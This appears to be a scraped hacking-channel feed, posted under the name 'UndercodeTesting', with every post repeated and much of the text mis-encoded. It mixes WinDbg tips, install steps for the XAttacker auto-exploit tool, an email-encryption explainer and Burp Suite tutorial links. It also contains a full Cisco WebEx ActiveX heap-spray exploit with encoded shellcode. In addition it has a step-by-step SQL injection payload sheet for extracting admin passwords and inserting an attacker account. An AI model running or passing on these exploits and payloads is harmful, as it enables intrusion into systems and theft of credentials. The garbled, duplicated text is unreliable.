WinDbg Malware Analysis Cheat Sheet.pdf
2 MB
1) !address List all memory segments in the process with their permissions and memory type. This is similar to the Memory Map in x64dbg.
2) !address [virtual address] List information about the memory segment that contains the virtual address. For example !address 400000 would show information about the section that contains address 0x40000. This is a quick way to find the start and end of a memory segment if you want to dump it.
.writemem [file name] [start address] [end address] Dump memory range to file. For example, .writemem C:
3) \dump.bin 400000 401000 would dump memory starting at 0x40000 and ending at 0x401000 to the dump.bin file.
eb [address] [byte] Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs here.
#full with video
2) !address [virtual address] List information about the memory segment that contains the virtual address. For example !address 400000 would show information about the section that contains address 0x40000. This is a quick way to find the start and end of a memory segment if you want to dump it.
.writemem [file name] [start address] [end address] Dump memory range to file. For example, .writemem C:
3) \dump.bin 400000 401000 would dump memory starting at 0x40000 and ending at 0x401000 to the dump.bin file.
eb [address] [byte] Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs here.
#full with video
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
on termux install :
1) git clone https://github.com/Moham3dRiahi/XAttacker.git
2) cd XAttacker
3) chmod +x termux-install.sh
4) bash termux-install.sh
π¦Installation Windows alt tag
1) Download Perl
2) Download XAttacker
3) Extract XAttacker into Desktop
4) Open CMD and type the following commands:
5) cd Desktop/XAttacker-master/
6) perl XAttacker.pl
π¦SOME FEATURES :
blocktestimonial Exploit
β’ Rightnow Theme Exploit
β’ Konzept Exploit
β’ Omni Secure Files Exploit
β’ Pitchprint Exploit
β’ Satoshi Exploit
β’ Pinboard Exploit
β’ Barclaycart Exploit
β’ Com Facileforms Exploit
β’ Com Jwallpapers Exploit
β’ Com Extplorer Exploit
β’ Com Rokdownloads Exploit
β’ Com Sexycontactform Exploit
β’ Com Jbcatalog Exploit
β’ Com Blog Exploit
β’ Com Foxcontact Exploit
β’ Drupal Geddon Exploit
@UndercodeTesting
β verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
on termux install :
1) git clone https://github.com/Moham3dRiahi/XAttacker.git
2) cd XAttacker
3) chmod +x termux-install.sh
4) bash termux-install.sh
π¦Installation Windows alt tag
1) Download Perl
2) Download XAttacker
3) Extract XAttacker into Desktop
4) Open CMD and type the following commands:
5) cd Desktop/XAttacker-master/
6) perl XAttacker.pl
π¦SOME FEATURES :
blocktestimonial Exploit
β’ Rightnow Theme Exploit
β’ Konzept Exploit
β’ Omni Secure Files Exploit
β’ Pitchprint Exploit
β’ Satoshi Exploit
β’ Pinboard Exploit
β’ Barclaycart Exploit
β’ Com Facileforms Exploit
β’ Com Jwallpapers Exploit
β’ Com Extplorer Exploit
β’ Com Rokdownloads Exploit
β’ Com Sexycontactform Exploit
β’ Com Jbcatalog Exploit
β’ Com Blog Exploit
β’ Com Foxcontact Exploit
β’ Drupal Geddon Exploit
@UndercodeTesting
β verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.
From unauthenticated to root on a supervision appliance.pdf
469.9 KB
EyesOfNetwork (βEONβ) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity
#full tutorial + pictures
#full tutorial + pictures
Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
#requested full with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦3 ways to encrypt emails
> There are currently three common mail encryption methods:
1οΈβ£The first type: use symmetric encryption algorithm to encrypt mail
Symmetric encryption algorithm is an earlier encryption algorithm with mature technology. In the symmetric encryption algorithm, the data sender processes the plaintext (original data) and the encryption key together with a special encryption algorithm to make it a complex encrypted ciphertext and send it out. After receiving the ciphertext, if the recipient wants to interpret the original text, it needs to decrypt the ciphertext using the used encryption key and the inverse algorithm of the same algorithm to restore it to a readable plaintext.
2οΈβ£The second type: use PKI/CA certification to encrypt encrypted mail
Most of the current email encryption systems are based on this encryption method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center.Therefore, people collectively referred to as "PKI/CA".. The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it is responsible for uploading user information to the certification center through the network, and the certification center is responsible for the final certification processing. The revocation and renewal of the certificate also needs to be submitted by the registration agency to the certification center for processing. In general, the certification center is oriented to each registration center, and the registration center is oriented to the end user, and the registration agency is the intermediate channel between the user and the certification center. The management of public key certificates is a complex system. his encryption method is only suitable for enterprises, organizations and some high-end users. Because of the trouble to obtain CA certificates and cumbersome exchanges, this type of email encryption mode has been difficult to popularize.
3οΈβ£The third type: the use of identity-based password technology for email encryption
In order to simplify the key management problem of the traditional public key cryptosystem, in 1984, A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of ββidentity-based cryptography: the userβs public identity information (such as e-mail addresses) , IP address, name..., etc.) as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems has become a hot research field in cryptography
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦3 ways to encrypt emails
> There are currently three common mail encryption methods:
1οΈβ£The first type: use symmetric encryption algorithm to encrypt mail
Symmetric encryption algorithm is an earlier encryption algorithm with mature technology. In the symmetric encryption algorithm, the data sender processes the plaintext (original data) and the encryption key together with a special encryption algorithm to make it a complex encrypted ciphertext and send it out. After receiving the ciphertext, if the recipient wants to interpret the original text, it needs to decrypt the ciphertext using the used encryption key and the inverse algorithm of the same algorithm to restore it to a readable plaintext.
2οΈβ£The second type: use PKI/CA certification to encrypt encrypted mail
Most of the current email encryption systems are based on this encryption method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center.Therefore, people collectively referred to as "PKI/CA".. The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it is responsible for uploading user information to the certification center through the network, and the certification center is responsible for the final certification processing. The revocation and renewal of the certificate also needs to be submitted by the registration agency to the certification center for processing. In general, the certification center is oriented to each registration center, and the registration center is oriented to the end user, and the registration agency is the intermediate channel between the user and the certification center. The management of public key certificates is a complex system. his encryption method is only suitable for enterprises, organizations and some high-end users. Because of the trouble to obtain CA certificates and cumbersome exchanges, this type of email encryption mode has been difficult to popularize.
3οΈβ£The third type: the use of identity-based password technology for email encryption
In order to simplify the key management problem of the traditional public key cryptosystem, in 1984, A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of ββidentity-based cryptography: the userβs public identity information (such as e-mail addresses) , IP address, name..., etc.) as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems has become a hot research field in cryptography
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD HACKING RESOURCES
1. Setup lab with bWAPP β https://www.youtube.com/watch? v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
2. Set up Burp Suite β https://www.youtube.com/watch? v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
3. Congure Firefox and add certicate β https://www.youtube.com/watch? v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
4. Mapping and scoping website β https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
5. Spidering β https://www.youtube.com/watch? v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
6. Active and passive scanning β https://www.youtube.com/watch? v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
7. Scanner options and demo β https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
8. Introduction to password security β https://www.youtube.com/watch? v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
9. Intruder β https://www.youtube.com/watch? v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
10. Intruder attack types β https://www.youtube.com/watch? v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
11. Payload settings β https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD HACKING RESOURCES
1. Setup lab with bWAPP β https://www.youtube.com/watch? v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
2. Set up Burp Suite β https://www.youtube.com/watch? v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
3. Congure Firefox and add certicate β https://www.youtube.com/watch? v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
4. Mapping and scoping website β https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
5. Spidering β https://www.youtube.com/watch? v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
6. Active and passive scanning β https://www.youtube.com/watch? v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
7. Scanner options and demo β https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
8. Introduction to password security β https://www.youtube.com/watch? v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
9. Intruder β https://www.youtube.com/watch? v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
10. Intruder attack types β https://www.youtube.com/watch? v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
11. Payload settings β https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ASP+PHP standard SQL injection statement (full version)
1)) Determine whether there is an injection point
'; and 1=1 and 1=2
2)) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists
3)) Guess the number of accounts. If you encounter 0< return to the correct page 1< return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4)) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)
5)) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)
and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)
6)) Guess the character
and 1=(select count(*) from admin where left(name,1)='a') ---
and 1=(select count(*) from admin where left(name,2)='ab')--
Just add one character at a time and guess like this, and guess how many digits you just guessed, and the account number will be calculated.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
π¦the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Look at the server patch = something went wrong and SP4 patch was applied
and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ASP+PHP standard SQL injection statement (full version)
1)) Determine whether there is an injection point
'; and 1=1 and 1=2
2)) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists
3)) Guess the number of accounts. If you encounter 0< return to the correct page 1< return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4)) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)
5)) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)
and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)
6)) Guess the character
and 1=(select count(*) from admin where left(name,1)='a') ---
and 1=(select count(*) from admin where left(name,2)='ab')--
Just add one character at a time and guess like this, and guess how many digits you just guessed, and the account number will be calculated.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
π¦the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Look at the server patch = something went wrong and SP4 patch was applied
and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE HACKING
Please choose an option (5h vote) :
--You need
--You need
Final Results
21%
More Linux/Termux Tools ?
24%
More Courses ?
19%
More Hacking Tips ?
14%
More about social media pentesting ?
22%
More related webHacking ?